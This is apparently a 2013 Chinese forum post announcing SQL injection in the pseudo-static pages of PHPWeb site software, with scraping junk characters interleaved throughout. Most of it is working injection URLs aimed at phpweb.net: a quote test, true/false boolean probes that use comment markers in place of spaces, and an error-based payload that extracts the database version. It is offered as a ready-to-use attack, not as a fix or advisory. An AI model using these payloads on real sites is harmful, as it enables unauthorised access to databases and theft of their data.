phpweb所有的整站程序伪静态页面都存在sql注入" B) ^, w! V" a$ ~6 v* O a
, s6 b# @% {8 @3 q# x5 B+ {
主站:http://phpweb.net/4 L- {! r) `" s, I$ p
加’检测:: H J& C% b. q8 o! o9 W. P, m
5 G5 a7 W$ o" q, l& e6 d2 Khttp://www.phpweb.net/down/html/?772′.html
5 R1 |& t+ d7 a7 o5 |4 l: ^
+ Y" R' l+ }* L. s9 x8 P' C出错
/ ~8 q) G7 F$ @, H存在注入。
( m2 `% X4 m* Z4 J不能用空格,只能用/*罗( E! ]6 b; W% ^4 K4 q
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常$ W/ h( \6 w+ u- T) I3 {+ R4 g
* A' s1 ^/ J& |: R! Q Dhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.* q! Y+ O# R9 `# t4 v5 S' A
爆数据库版本:' X' H8 F; Z( {: P* m5 l2 r
0 g' t0 r( z( _, C4 L0 T$ E! G
?
. R$ L/ L; A$ \! V% e. o1
, x% A5 w7 @5 c l2 ]http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html0 E1 n7 J1 r! w) i
更新日期: 2013-01-03 13:39:50 a0 {& ?) w, _- @4 O+ O
|
发表于 2013-1-4 19:46:42
收藏
支持
反对